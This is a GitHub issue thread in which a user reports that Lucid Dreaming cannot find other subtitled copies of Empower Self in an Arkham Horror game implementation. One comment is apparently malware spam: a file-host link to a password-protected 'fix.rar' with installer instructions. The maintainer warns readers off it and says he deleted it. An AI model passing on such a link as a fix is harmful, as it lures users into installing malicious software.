### ISSUE TITLE
Lucid Dreaming won't locate other copies of Empower Self

### ISSUE THREAD

**Issue by mniksa3** [halogenandtoast/ArkhamHorror#446]
**Game ID**: 159f53ab-1029-4962-b483-e9635428bbf2

**Bug**: Lucid Dreaming cannot locate the other two copies of Empower Self (Acuity and Stamina) in my deck after selecting Empower Self (Alacrity) in my play area, likely because of their subtitles. Per the Rules Reference, Lucid Dreaming works for all copies of a card by title even if their subtype, traits, and/or text are different, so it _should_ work. I could also be misinterpreting the rules but I'm fairly sure this one is established

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by halogenandtoast** [comment]
Whatever that previous comment was please don't do anything it said, it's likely someone trying to hack your machine. I've deleted it.
